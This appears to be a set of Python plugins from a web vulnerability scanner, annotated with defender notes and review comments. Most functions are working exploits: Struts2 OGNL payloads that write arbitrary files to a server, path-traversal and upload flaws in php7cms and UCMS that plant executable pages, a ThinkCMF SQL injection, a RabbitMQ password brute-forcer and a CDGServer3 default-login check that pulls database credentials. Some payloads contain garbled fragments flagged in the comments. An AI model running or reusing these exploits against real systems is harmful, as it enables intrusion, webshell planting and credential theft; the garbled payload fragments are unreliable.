    """Check whether the web server accepts HTTP PUT (arbitrary file write).

    An OPTIONS request to ``<base_url>/testbyme`` is sent first; only when the
    ``Allow`` header lists ``PUT`` are three ``<timestamp>.jsp`` name variants
    (trailing ``/``, ``::$DATA``, ``%20``) PUT to the root, and a 201/204 answer
    is reported.

    Args:
        data: scanner state dict; reads ``base_url``.

    Returns:
        ``data``; every accepted variant adds an entry to ``data['data']`` and
        ``data['res']``.

    Defender note: PUT and OPTIONS should be disabled or authenticated on
    production hosts; a ``.jsp`` path with ``::$DATA`` or a trailing ``/`` in a PUT
    is a clear signature.
    """
    data = init(data, 'web')
    if data['base_url'] != None:
        try:
            res = curl('options',data['base_url']+"/testbyme")
            allow = res.headers['Allow']
            if 'PUT' in allow:
                for _url in [str(int(time.time())) + '.jsp/',str(int(time.time())) + '.jsp::$DATA',str(int(time.time())) + '.jsp%20']:
                    url =  data['base_url'] + _url
                    res = curl('put', url)
                    # NOTE(review): every other check on this page reads
                    # .status_code; if curl() returns a requests Response,
                    # .status does not exist and the AttributeError is
                    # swallowed by the bare except below.
                    if res.status == 201 or res.status == 204:
                        data['flag'] = 1
                        data['data'].append({"method": "put"})
                        data['res'].append({"info": url,"key":"PUT"})
        except:
            pass
    return data
def upload(data):
    """Write a file on a Struts2 host via an OGNL expression in the ``Content-Type`` header.

    The expression opens a ``FileOutputStream`` at ``%PATH%`` (replaced by
    ``data['despath']``), copies the request input stream into it, then echoes
    ``oko`` / ``kok/`` and the context path.

    Args:
        data: scanner state dict; ``url``, ``srcpath`` and ``despath`` are read.

    Returns:
        ``data``; ``flag`` is set after the request without inspecting the
        response, and the complete header dict (payload included) is stored in
        ``data['data']``.

    Defender note: a ``Content-Type`` header value beginning with ``%{`` is the
    request signature.
    """
    data = init(data, 'struts')
    if data['url'] != None:
        despath = data['despath']
        content = _read_file(data['srcpath'])
        headers = {}
        headers[
            "Content-Type"] = """%{(#test='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@getRequest()).(#[email protected]@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#fs=new java.io.FileOutputStream("%PATH%")).(#out=#res.getOutputStream()).(@org.apache.commons.io.IOUtils@copy(#req.getInputStream(),#fs)).(#fs.close()).(#out.print('oko')).(#out.print('kok/')).(#out.print(#req.getContextPath())).(#out.close())}""".replace(
                "%PATH%", despath).replace("%FILECONTENT%", content)
        try:
            # Response is discarded; success is assumed once the request is sent.
            curl('get', data['url'], headers=headers)
            data['flag'] = 1
            data['data'].append({"headers": headers})
            data['res'].append({"info": data['despath'], "key": 'upload'})
        except:
            # Bare except: any failure is silent.
            pass
    return data
def _gethtml(url):
    """Fetch *url* with ``curl`` and return ``{"html", "code", "url"}``.

    Any exception raised while fetching or reading the response (including a
    ``None`` response) yields ``{"html": "", "code": 0, "url": url}`` instead of
    propagating.
    """
    try:
        response = curl('get', url)
        body, status = response.text, response.status_code
    except Exception:
        return {"html": "", "code": 0, "url": url}
    return {"html": body, "code": status, "url": url}
def prove(data):
    """Try dictionary username/password pairs against the RabbitMQ management API (``api/whoami``) with HTTP Basic auth.

    Dictionary paths default to ``dict/rabbitmq_usernames.txt`` and
    ``dict/rabbitmq_passwords.txt`` unless ``data['d1']`` / ``data['d2']`` override
    them.  A password containing ``%user%`` has it replaced by the current
    username.  The first pair whose response is not 401 and contains ``Console``
    is recorded and the function returns.

    Args:
        data: scanner state dict; reads ``base_url``.

    Returns:
        ``data``.

    Defender note: a burst of Basic-auth GETs to ``/api/whoami`` with varying
    credentials from one source is the observable pattern; lockout or rate
    limiting on the management API is the mitigation.
    """
    data = init(data, 'rabbitmq')
    if data['base_url']:
        usernamedic = _read_dic(data['d1']) if 'd1' in data.keys(
        ) else _read_dic('dict/rabbitmq_usernames.txt')
        passworddic = _read_dic(data['d2']) if 'd2' in data.keys(
        ) else _read_dic('dict/rabbitmq_passwords.txt')
        url = data['base_url'] + 'api/whoami'
        res = curl('get', url)
        # NOTE(review): ``res`` is compared with the int 401 here and below;
        # everywhere else on this page curl() returns a response object whose
        # .status_code carries the status, so as written this branch would only
        # be taken if curl() returns bare status codes on auth failure.
        if res == 401:
            for linef1 in usernamedic:
                username = linef1.strip('\r').strip('\n')
                for linef2 in passworddic:
                    try:
                        password = (linef2 if '%user%' not in linef2 else
                                    str(linef2).replace(
                                        "%user%",
                                        str(username))).strip('\r').strip('\n')

                        key = str(
                            b64encode(
                                bytes(":".join([username, password]),
                                      'utf-8')), 'utf-8')
                        headers = {"Authorization": 'Basic %s' % key}
                        res = curl('get', url, headers=headers)
                        if res != 401 and 'Console' in res.text:

                            data['flag'] = 1
                            data['data'].append({
                                "username": username,
                                "password": password
                            })
                            # The stored "key" is the plaintext user:password,
                            # not the base64 value actually sent.
                            data['res'].append({
                                "info":
                                username + "/" + password,
                                "key":
                                "Authorization: " +
                                ":".join([username, password])
                            })
                            return data
                    except Exception:
                        pass
    return data
def prove(data):
    """Check the UCMS ``uploadpic_html.jsp`` endpoint for writing a caller-named JSP.

    A small XML document (whose body is the base64 of ``test by me``) is POSTed
    with ``toname=justfortest.jsp`` and ``diskno=xxxx``; the file is then
    requested under ``cms-data/temp_dir/xxxx/temp.files/`` and ``test by me`` in
    the response confirms the write.  Both ``data['base_url']`` and
    ``data['url']`` are tried as prefixes.

    Args:
        data: scanner state dict; reads ``base_url`` and ``url``.

    Returns:
        ``data``.

    Defender note: ``justfortest.jsp`` under ``temp_dir`` is the artifact; any
    request to ``uploadpic_html.jsp`` with a ``.jsp`` ``toname`` is the signature.
    """
    # The literal keeps its leading newline and indentation, so the document
    # does not start with the <?xml declaration.
    xmldata = '''
    <?xml version="1.0" encoding="UTF-8"?>
    <root>
    dGVzdCBieSBtZQ==
    </root>
    '''
    data = init(data,'ucms')
    if data['base_url']:
        for url in [data['base_url'], data['url']]:
            myurl = url + '/ucms/cms/client/uploadpic_html.jsp?toname=justfortest.jsp&diskno=xxxx'
            res = curl('post',myurl,data = xmldata)
            # NOTE(review): ``is 200`` only works because CPython caches small
            # ints; ``==`` is the correct comparison (SyntaxWarning on 3.8+).
            if res != None and res.status_code is 200:
                myurl = url + '/ucms/cms-data/temp_dir/xxxx/temp.files/justfortest.jsp'
                # The verification request is also a POST carrying the same body.
                testres = curl('post',myurl,data = xmldata)
                if testres != None and 'test by me' in testres.text:
                    data['flag'] = 1
                    data['data'].append({"page": myurl})
                    data['res'].append({"info": myurl, "key": "ucms upload"})
    return data
def upload(data=None):
    """Write ``data['srcpath']``'s contents to ``data['despath']`` via OGNL in the ``name`` field of struts2-showcase's ``saveGangster.action`` form.

    The expression opens a ``FileOutputStream`` at ``%PATH%`` (replaced by
    ``despath``) and copies the request input stream into it, printing
    ``start:`` / ``oko`` / ``kok/:end`` and the context path as markers.

    Args:
        data: scanner state dict; ``url`` is checked, then ``base_url``,
            ``srcpath`` and ``despath`` are read.

    Returns:
        ``data``; ``flag`` is set once the request was sent, without checking
        the response.

    Defender note: the showcase application should not be deployed on
    production hosts; a ``name=%{`` form field is the request signature.
    """
    data = init(data, 'struts')
    if data['url'] != None:
        upload_poc = '''%{(#test='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@getRequest()).(#[email protected]@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('start:')).(#fs=new java.io.FileOutputStream(%PATH%)).(#out=#res.getOutputStream()).(@org.apache.commons.io.IOUtils@copy(#req.getInputStream(),#fs)).(#fs.close()).(#out.print('oko')).(#out.print('kok/:end')).(#out.print(#req.getContextPath())).(#out.close())}'''
        despath = data['despath']
        content = _read_file(data['srcpath'])
        try:
            _data = 'name=' + upload_poc.replace("%PATH%", despath).replace(
                "%FILECONTENT%",
                content) + '&age=a&__checkbox_bustedBefore=true&description=s'
            # NOTE(review): the guard above tests data['url'], but the request
            # goes to data['base_url'] + the fixed showcase path.
            curl('post',
                 data['base_url'] +
                 '/struts2-showcase/integration/saveGangster.action',
                 data=_data)
            data['flag'] = 1
            data['data'].append({"poc": upload_poc})
            data['res'].append({"info": despath, "key": 'upload'})
        except:
            # Bare except: any failure is silent.
            pass
    return data
def prove(data):
    """Check php7cms's ``save_form_data`` API for a path-traversal file write.

    ``name=/../../../adminsss.php"`` is passed to
    ``index.php?s=api&c=api&m=save_form_data`` with a ``<?php phpinfo()?>`` body;
    ``adminsss.php`` is then fetched at the site root (or under ``php7cms/``) and
    ``php.ini`` in the output confirms execution.

    Args:
        data: scanner state dict; reads ``base_url``.

    Returns:
        ``data``; stops at the first path that confirms.

    Defender note: ``adminsss.php`` at the web root is the artifact; a
    ``save_form_data`` request whose ``name`` contains ``../`` is the signature.
    """
    data = init(data, 'php7cms')
    if data['base_url']:
        for path in ["", "php7cms/"]:
            postData = {'data': '<?php phpinfo()?>'}
            url1 = data[
                'base_url'] + path + 'index.php?s=api&c=api&m=save_form_data&name=/../../../adminsss.php"'
            res = curl('post', url1, data=postData)
            # Any non-None response (status not checked) triggers the verification GET.
            if res != None:
                url2 = data['base_url'] + path + 'adminsss.php'
                res = curl('get', url2)
                if res != None and "php.ini" in res.text:
                    data['flag'] = 1
                    data['data'].append({"url": url2})
                    data['res'].append({
                        "info": url1,
                        "key": "php7cms getshell"
                    })
                    break
    return data
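def prove(data):
    """Fingerprint a web page by content keywords and ``<title>``.

    Fetches ``data['url']``, scans the body for every keyword of the
    dictionary (``data['dic_one']`` when present, else
    ``dict/web_content_key.txt``), extracts the page title and - when at
    least one keyword matched - records
    ``{"info": <title>, "key": <matched keywords, comma-joined>,
    "status": <HTTP status>}`` in ``data['res']``.

    Args:
        data: plugin state dict; ``url`` is the page to fetch.

    Returns:
        The same dict; ``flag`` is 1 when a keyword matched.
    """
    data = init(data, 'web')
    if not data['url']:
        return data

    result = curl('get', data['url'])
    if result is None:
        return data
    status = result.status_code
    content = result.text

    # --- keyword scan -----------------------------------------------------
    dic_path = data['dic_one'] if 'dic_one' in data else 'dict/web_content_key.txt'
    matched = []
    for raw_key in _read_dic(dic_path):
        # The dictionary is read as bytes; strip line endings before matching.
        search_key = str(raw_key, 'utf-8').replace("\r", "").replace("\n", "")
        try:
            if search_key in content:
                matched.append(search_key)
                data['flag'] = 1
        except Exception as e:
            print(e)

    # --- title ------------------------------------------------------------
    title = _page_title(result)

    if data['flag'] == 1:
        data['res'].append({"info": title, "key": ','.join(matched), "status": status})

    return data


def _page_title(result):
    """Return the page title of ``result`` as a cleaned ``str``.

    ``[None Title]`` when there is no ``<title>`` (or it is empty),
    ``[Error Code]`` when the title cannot be re-encoded with the response
    encoding or decoded with utf-8, gbk or that encoding.

    NOTE(review): the original candidate list ended with the builtin
    ``type`` (a typo that could never decode) and relied on a ``finally``
    clause to emit ``[Error Code]``; a plain-``str`` title (no response
    encoding) always fell through to ``[Error Code]`` too.  Both are fixed.
    """
    soup = BeautifulSoup(result.text, "html5lib")
    if soup is None:
        return '[None Title]'
    tag = soup.title
    if tag is None or not tag.string:
        return '[None Title]'

    text = tag.string
    if result.encoding is None:
        # BeautifulSoup already produced text; nothing to re-decode.
        return text.strip().replace("\r", "").replace("\n", "")

    try:
        raw = text.encode(result.encoding)
    except Exception:
        return '[Error Code]'

    # Same candidate order as before: utf-8, gbk, then the response encoding.
    for codec in ('utf-8', 'gbk', result.encoding):
        try:
            return raw.decode(codec).strip().replace("\r", "").replace("\n", "")
        except Exception:
            continue
    return '[Error Code]'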
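def prove(data):
    """Check a CDGServer3 (yst_dlp) install for the ``configadmin`` default login.

    Two requests are made against ``base_url``:

    1. ``GET /CDGServer3/help/getEditionInfo.jsp`` - the licensed-user name
       is scraped from a fixed table cell (row 6 when the page contains
       ``授权用户``, row 5 otherwise).  Any failure here only loses the name.
    2. ``POST /CDGServer3/SystemConfig`` with ``name=configadmin`` and the
       password literal below.  If the reply carries the
       ``est.connection.username`` / ``est.connection.password`` inputs,
       the database credentials are read from them.

    On success ``data['res']`` gets ``name/sql_user/sql_pass`` (prefixed
    with ``host:1433/`` when TCP 1433 on ``target_host`` accepts a
    connection) under key ``configadmin/123456`` and ``flag`` is set.

    Args:
        data: plugin state dict (``base_url``, ``target_host``, ...).

    Returns:
        The same dict.

    NOTE(review): the ``pass`` value in this listing reads ``******`` while
    the reported key says ``configadmin/123456``; the literal looks masked
    by the corpus - confirm against the upstream source before use.
    """
    data = init(data, 'yst_dlp')
    if not data['base_url']:
        return data

    name = ''
    try:
        url = data['base_url'] + '/CDGServer3/help/getEditionInfo.jsp'
        r = curl('get', url)
        # ``if r`` rather than ``is not None``: presumably a requests
        # Response, which is falsy on error statuses, so error pages skip.
        if r:
            res = r.text
            soup = BeautifulSoup(res, 'html5lib')
            row = 6 if '授权用户' in res else 5
            cells = soup.select(
                ('body > div:nth-of-type(2) > table > tbody > '
                 'tr:nth-of-type(%d) > td:nth-of-type(2) > input[type="text"]') % row)
            # Keep ``name`` a string when the cell is missing.  The original
            # left the empty result list in ``name``, which made the string
            # concatenation below raise and silently dropped a real finding.
            if cells:
                name = cells[0]['value']
    except Exception:
        name = ''

    sql_result = None
    try:
        url = data['base_url'] + '/CDGServer3/SystemConfig'
        _data = {'command': 'Login', 'verifyCodeDigit': 'dfd', 'name': 'configadmin', 'pass': '******'}
        r = curl('post', url, data=_data)
        if r:
            soup = BeautifulSoup(r.content, 'html5lib')
            sql_user = soup.select('#est\\.connection\\.username')[0]['value']
            sql_pass = soup.select('#est\\.connection\\.password')[0]['value']
            sql_result = name + '/' + sql_user + '/' + sql_pass
    except Exception:
        # Missing inputs (IndexError/KeyError) or a failed request: no hit.
        sql_result = None

    if sql_result:
        if _socket_connect(data['target_host'], 1433):
            sql_result = data['target_host'] + ":1433/" + sql_result
        data['flag'] = 1
        data['data'].append({"page": url})
        data['res'].append({"info": sql_result, "key": "configadmin/123456"})

    return data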
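def prove(data):
    """Probe ThinkCMF 2.2.3 for error-based SQL injection in ``edit_post``.

    POSTs a preformatted body whose ``post[id][1]`` value carries
    ``updatexml(1,concat(0x7e,(select user()),0x7e),1)`` to
    ``index.php?g=Portal&m=Article&a=edit_post``.  The injection counts as
    confirmed only when the reply echoes ``:XPATH`` - the MySQL
    ``updatexml`` error text the payload provokes.

    Args:
        data: plugin state dict; ``base_url`` is the ThinkCMF root.

    Returns:
        The same dict; ``flag`` is 1 and ``data``/``res`` are extended on a
        hit.

    Note: ``init``'s return value is assigned back to ``data`` as in the
    sibling checks; the original discarded it.
    """
    data = init(data, 'thinkcmf')
    if not data['base_url']:
        return data

    url = data['base_url'] + "index.php?g=Portal&m=Article&a=edit_post"
    # Sent as a preformatted string so the bracketed keys are not re-encoded.
    payload = (
        'term=123&post[post_title]=123&post[post_title]=aaa&post_title=123'
        '&post[id][0]=bind'
        '&post[id][1]=0 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))'
    )
    res = curl('post', url, data=payload)
    if res is not None and ':XPATH' in res.text:
        data['flag'] = 1
        data['data'].append({"flag": url})
        data['res'].append({"info": url, "key": "thinkcmf 2.2.3 sql"})
    return data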
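def upload(data=None):
    """Write a file to a Struts2 target through an OGNL expression in a multipart file name.

    The OGNL text below is passed as the *file name* of the ``test`` part
    (requests' ``(filename, content)`` tuple form; the part body is just
    ``text/plain``), and the trailing ``\\0b`` puts a NUL byte after the
    expression.  On an affected server the expression writes the
    URL-decoded ``%FILECONTENT%`` to ``%PATH%`` and prints ``oko``,
    ``kok/`` and the context path into the response.

    Those two markers are split in the payload and only ever adjacent in a
    reply, so ``okokok/`` in the response body indicates the expression
    ran.  The original set ``flag`` unconditionally whenever the request
    did not raise, reporting a hit for any reachable host; this version
    requires the marker.

    Args:
        data: plugin state dict with ``url``, ``srcpath`` (local file whose
            contents are spliced in; the payload URL-decodes them, so they
            are expected to be percent-encoded already) and ``despath``
            (path to create on the target).

    Returns:
        The same dict; ``flag`` is 1 and ``data``/``res`` are extended only
        on a verified hit.

    NOTE(review): the ``[email protected]`` fragments in the payload look like
    an e-mail-obfuscation artifact of this listing rather than valid OGNL;
    restore them from the upstream source before relying on this check.
    """
    data = init(data, 'struts')
    if data['url'] is None:
        return data

    upload_poc = '''%{(#test='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@getRequest()).(#[email protected]@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#filecontent='%FILECONTENT%').(new java.io.BufferedWriter(new java.io.FileWriter('%PATH%')).append(new java.net.URLDecoder().decode(#filecontent,'UTF-8')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}\0b'''
    despath = data['despath']
    content = _read_file(data['srcpath'])
    headers = {}
    try:
        files = {
            "test": (
                upload_poc.replace("%PATH%", despath).replace("%FILECONTENT%", content),
                "text/plain",
            )
        }
        res = curl('post', data['url'], headers=headers, files=files)
    except Exception:
        # Best effort: a request that fails to send is simply "no hit".
        return data

    if res is not None and 'okokok/' in res.text:
        data['flag'] = 1
        data['data'].append({"poc": upload_poc})
        data['res'].append({"info": despath, "key": 'upload'})
    return data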
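def upload(data=None):
    """Write a file to a Struts2 target via a ``method:``-prefixed OGNL query string.

    The whole payload is handed to ``curl`` as ``params``: a preformatted,
    already percent-encoded string (requests passes a string ``params``
    through unchanged as the query string).  The expression writes
    ``shellContent`` to ``shellname`` (``%PATH%``) and prints ``info1``
    (``oko``), ``info2`` (``kok/``) and the context path into the reply.

    ``%FILECONTENT%`` is spliced into the query string verbatim, so the
    contents of ``data['srcpath']`` are expected to be percent-encoded
    already; a raw ``&`` or ``%`` would cut the parameter short.  The
    original reported a hit whenever the request did not raise; this
    version requires the ``okokok/`` marker (only ever contiguous in a
    reply) in the response body.

    Args:
        data: plugin state dict with ``url``, ``srcpath`` and ``despath``.

    Returns:
        The same dict; ``flag``/``data``/``res`` are updated only on a
        verified hit.

    NOTE(review): the ``[email protected]`` fragment in the payload looks like
    an e-mail-obfuscation artifact of this listing rather than valid OGNL;
    restore it from the upstream source before relying on this check.
    """
    data = init(data, 'struts')
    if data['url'] is None:
        return data

    upload_poc = '''method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23req.getContextPath()),%23w.close(),1?%23xx:%23request.toString&shellname=%PATH%&shellContent=%FILECONTENT%&encoding=UTF-8&pp=%2f&info1=oko&info2=kok%2f'''
    despath = data['despath']
    content = _read_file(data['srcpath'])
    # Kept from the original; a Content-Type on a GET is harmless.
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    try:
        query = upload_poc.replace("%PATH%", despath).replace("%FILECONTENT%", content)
        res = curl('get', data['url'], params=query, headers=headers)
    except Exception:
        # Best effort: a request that fails to send is simply "no hit".
        return data

    if res is not None and 'okokok/' in res.text:
        data['flag'] = 1
        data['data'].append({"poc": upload_poc})
        data['res'].append({"info": despath, "key": "upload"})

    return data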
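def prove(data):
    """Record the HTTP methods a server advertises in response to OPTIONS.

    Sends ``OPTIONS <base_url>/testbyme`` and, if the reply carries an
    ``Allow`` header, stores its value in ``data['res']`` under key
    ``OPTIONS`` and sets ``flag``.  A failed request, a missing response
    or a missing header all count as "nothing found".

    Args:
        data: plugin state dict; ``base_url`` is the server root.

    Returns:
        The same dict.

    Note: an ``Allow`` header only states what the server claims; verify
    any interesting method (PUT, DELETE, ...) separately before reporting
    it as usable.
    """
    data = init(data, 'web')
    if data['base_url'] is None:
        return data

    try:
        res = curl('options', data['base_url'] + "/testbyme")
        # ``.get`` instead of indexing: the original needed a bare ``except``
        # just to swallow the KeyError of an absent header.
        allow = None if res is None else res.headers.get('Allow')
    except Exception:
        return data

    if allow is None:
        return data
    data['flag'] = 1
    data['data'].append({"method": "options"})
    data['res'].append({"info": allow, "key": "OPTIONS"})
    return data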